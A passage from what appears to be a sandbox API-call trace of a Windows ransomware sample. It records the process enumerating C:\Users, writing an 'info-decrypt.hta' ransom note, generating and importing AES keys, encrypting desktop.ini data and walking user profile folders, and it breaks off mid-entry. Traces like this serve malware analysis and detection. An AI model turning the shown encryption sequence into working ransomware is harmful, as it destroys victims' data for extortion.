GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] ResetEvent (hEvent=0xb8) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] SetEvent (hEvent=0xbc) returned 1 [0167.600] SetEvent (hEvent=0xb8) returned 1 [0167.600] CloseHandle (hObject=0x598) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] ResetEvent (hEvent=0xb8) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] ResetEvent (hEvent=0xb8) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] SetEvent (hEvent=0xbc) returned 1 [0167.600] SetEvent (hEvent=0xb8) returned 1 [0167.600] CloseHandle (hObject=0x59c) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] ResetEvent (hEvent=0xb8) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.601] GetCurrentThreadId () returned 0x72c [0167.601] ResetEvent (hEvent=0xb8) returned 1 [0167.601] GetCurrentThreadId () returned 0x72c [0167.601] GetCurrentThreadId () returned 0x72c [0167.601] SetEvent (hEvent=0xbc) returned 1 [0167.601] SetEvent (hEvent=0xb8) returned 1 [0167.601] CloseHandle (hObject=0x5a0) returned 1 [0167.602] SysReAllocStringLen (in: pbstr=0x657fc10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657fc10*="KERNEL32.DLL") returned 1 [0167.602] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.606] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 120 os_tid = 0x7c0 [0133.596] SysReAllocStringLen (in: pbstr=0x949f5dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x949f5dc*="KERNEL32.DLL") returned 1 [0133.596] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0133.597] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0133.600] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0133.602] SysReAllocStringLen (in: pbstr=0x949f5dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x949f5dc*="KERNEL32.DLL") returned 1 [0133.602] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0133.602] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0133.605] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0133.605] SysReAllocStringLen (in: pbstr=0x949f5b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x949f5b8*="KERNEL32.DLL") returned 1 [0133.605] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0133.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0133.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0133.612] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0133.613] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0133.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ee0c) returned 1 [0133.614] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x949e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0133.614] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x949e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0133.614] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x949eb34 | out: lpFindFileData=0x949eb34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.614] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.614] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0133.616] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0133.616] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0133.616] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949edcc) returned 1 [0133.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949edd8) returned 1 [0133.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ee0c) returned 1 [0133.616] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x949e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0133.616] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x949e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0133.616] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x949eb34 | out: lpFindFileData=0x949eb34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.617] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.617] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0133.617] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0133.617] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0133.617] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0133.618] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0133.618] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0133.618] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0133.618] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x949eb44 | out: lpFindFileData=0x949eb44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.618] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949edcc) returned 1 [0133.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949edd8) returned 1 [0133.619] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x949e880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0133.619] GetFullPathNameW (in: lpFileName="C:\\Users\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\info-decrypt.hta", lpFilePart=0x0) returned 0x19 [0133.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ece8) returned 1 [0133.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\info-decrypt.hta" (normalized: "c:\\users\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ed64 | out: lpFileInformation=0x949ed64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ece4) returned 1 [0133.619] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x949e880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0133.619] GetFullPathNameW (in: lpFileName="C:\\Users\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\info-decrypt.hta", lpFilePart=0x0) returned 0x19 [0133.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec1c) returned 1 [0133.619] CreateFileW (lpFileName="C:\\Users\\info-decrypt.hta" (normalized: "c:\\users\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5bc [0133.664] GetFileType (hFile=0x5bc) returned 0x1 [0133.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec18) returned 1 [0133.664] GetFileType (hFile=0x5bc) returned 0x1 [0133.665] WriteFile (in: hFile=0x5bc, lpBuffer=0x377175c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ece0, lpOverlapped=0x0 | out: lpBuffer=0x377175c*, lpNumberOfBytesWritten=0x949ece0*=0x1000, lpOverlapped=0x0) returned 1 [0133.666] WriteFile (in: hFile=0x5bc, lpBuffer=0x377175c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ecb4, lpOverlapped=0x0 | out: lpBuffer=0x377175c*, lpNumberOfBytesWritten=0x949ecb4*=0x55e, lpOverlapped=0x0) returned 1 [0133.667] CloseHandle (hObject=0x5bc) returned 1 [0133.667] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x949e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0133.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ed34) returned 1 [0133.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x3772778 | out: lpFileInformation=0x3772778*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0133.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed30) returned 1 [0133.667] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x949e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0133.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec68) returned 1 [0133.668] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5bc [0133.668] GetFileType (hFile=0x5bc) returned 0x1 [0133.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec64) returned 1 [0133.668] GetFileType (hFile=0x5bc) returned 0x1 [0133.668] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x949ed70 | out: lpFileSizeHigh=0x949ed70*=0x0) returned 0xae [0133.668] ReadFile (in: hFile=0x5bc, lpBuffer=0x377297c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ed1c, lpOverlapped=0x0 | out: lpBuffer=0x377297c*, lpNumberOfBytesRead=0x949ed1c*=0xae, lpOverlapped=0x0) returned 1 [0133.669] CloseHandle (hObject=0x5bc) returned 1 [0135.718] CryptAcquireContextW (in: phProv=0x949ecbc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ecbc*=0xbe0938) returned 1 [0137.641] CryptGenRandom (in: hProv=0xbe0938, dwLen=0x10, pbBuffer=0x3773cd0 | out: pbBuffer=0x3773cd0) returned 1 [0141.392] CryptImportKey (in: hProv=0xbe0938, pbData=0x36eb580, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ec8c | out: phKey=0x949ec8c*=0xb7f210) returned 1 [0141.392] CryptContextAddRef (hProv=0xbe0938, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.392] CryptContextAddRef (hProv=0xbe0938, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.392] CryptDuplicateKey (in: hKey=0xb7f210, pdwReserved=0x0, dwFlags=0x0, phKey=0x949ec7c | out: phKey=0x949ec7c*=0xb7f0d0) returned 1 [0141.392] CryptContextAddRef (hProv=0xbe0938, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.392] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x4, pbData=0x36eb660*=0x1, dwFlags=0x0) returned 1 [0141.392] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x1, pbData=0x36eb62c, dwFlags=0x0) returned 1 [0141.392] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36eb670*, pdwDataLen=0x949ece8*=0xb0, dwBufLen=0xb0 | out: pbData=0x36eb670*, pdwDataLen=0x949ece8*=0xb0) returned 1 [0141.392] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36eb744*, pdwDataLen=0x949ecf0*=0x0, dwBufLen=0x10 | out: pbData=0x36eb744*, pdwDataLen=0x949ecf0*=0x10) returned 1 [0141.394] CryptDestroyKey (hKey=0xb7f210) returned 1 [0141.394] CryptReleaseContext (hProv=0xbe0938, dwFlags=0x0) returned 1 [0141.394] CryptReleaseContext (hProv=0xbe0938, dwFlags=0x0) returned 1 [0141.394] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x949e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0141.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec54) returned 1 [0141.394] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949da90) returned 1 [0141.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949edbc) returned 1 [0141.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x949e8c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0141.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x949e898, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0141.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x949eae4 | out: lpFindFileData=0x949eae4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f210 [0141.397] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.398] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0141.398] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0141.398] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, 